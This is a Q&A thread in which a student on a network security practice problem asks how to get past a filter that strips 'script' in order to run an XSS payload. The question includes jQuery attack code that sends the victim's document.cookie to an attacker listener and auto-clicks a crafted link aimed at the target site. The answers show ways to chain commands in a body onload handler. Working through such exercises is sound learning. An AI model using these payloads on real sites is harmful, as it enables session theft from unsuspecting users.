# XSS with "script" removal

Tags: javascript, xss

This is from a network security practice problem.

The site (set up for this purpose) attempts to protect against XSS by filtering 'script' tags using the following code:

```
filtered = re.sub(r"(?i)script", "", input)
```

The task is to execute a payload in the victim's browser that would do things including send their cookies to a remote netcat connection. (I've already accomplished this when the site wasn't filtering 'script').

I've researched this and found that I can execute single javascript commands by making queries such as:

```
"<body onload=alert(\"hello\");>"
```

However, this doesn't solve my problem because it can only execute a single command (I believe). The payload I need to execute contains multiple commands.

I've also tried using HTML character codes to avoid the filter, such as:

```
"<s&#99;ript>..."
```

but the filter catches it.

Here is the codebase i'm using:

```
<html>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
<script>

function payload(attacker) {
    function log(data) {
        $.get(attacker, data);
        }
        function proxy(href) {
            $("html").load(href, function(){
                //Send cookie to remote connection
                log(document.cookie);
            });
        }
        proxy("./");
    }

    function makeLink(xssdefense, target, attacker) {
        if (xssdefense == 0) {
            //Code to execute when there is no filter
            return target + "./search?xssdefemse=" + xssdefense.toString() + "&q=" +
                encodeURIComponent("<script" + ">" + payload.toString() + ";payload(\"" + attacker + "\");</script" + ">");
        }
        else {
            //Code to execute when 'script' is filtered
            return target + "./search?xssdefemse=" + xssdefense.toString() + "&q=" +
                encodeURIComponent("<body onload=alert(\"test\");>"); 
            }
    }

    var xssdefense = 1;
    var target = "http://81.211.34.1/xsstest";
    var attacker = "http://127.0.0.1:31337/";

    $(function() {
        var url = makeLink(xssdefense, target, attacker);
        $("h3").html("<a id=\"link\" target=\"run\" href=\"" + url + "\"> Enter Site!<\a>");
        document.getElementById("link").click();
        });
        </script> <h3></h3>
    </html>
```

Any help would be greatly appreciated!

Comment: `r" (?i)script"`? Are you sure? That sounds like a syntax error.

Answer (score 4, accepted):

You can only have one expression in an `onload=` attribute, but you can still perform multiple commands.

### Good way:

```
<body onload="(function() { cmd1(); cmd2(); cmd3(); })();">
```

This defines a function expression which performs the 3 commands, and then gets called (that's the `()` at the end).

### More valid ways (but seriously, go with the first):

```
<body onload="cmd1(), cmd2(), cmd3();">
```

or, if you know they all return falsey values (like `undefined` by not returning anything)

```
<body onload="cmd1() || cmd2() || cmd3();">
```

inversely, if you know they all return truthy values (like numbers, strings or objects)

```
<body onload="cmd1() && cmd2() && cmd3();">
```

Answer (score 1):

You *can* have multiple expressions in `onload`:

```
<body onload="alert(1); alert(2);">
```

Answer (score -2):

I also got asked something similar
this.content = content.replaceAll("(?i)<(/)?script>", "");
and what worked for me is:
<script>alert(1)</script>

Comment: This does not really answer the question. If you have a different question, you can ask it by clicking [Ask Question](https://stackoverflow.com/questions/ask). To get notified when this question gets new answers, you can [follow this question](https://meta.stackexchange.com/q/345661). Once you have enough [reputation](https://stackoverflow.com/help/whats-reputation), you can also [add a bounty](https://stackoverflow.com/help/privileges/set-bounties) to draw more attention to this question. - [From Review](/review/late-answers/35476404)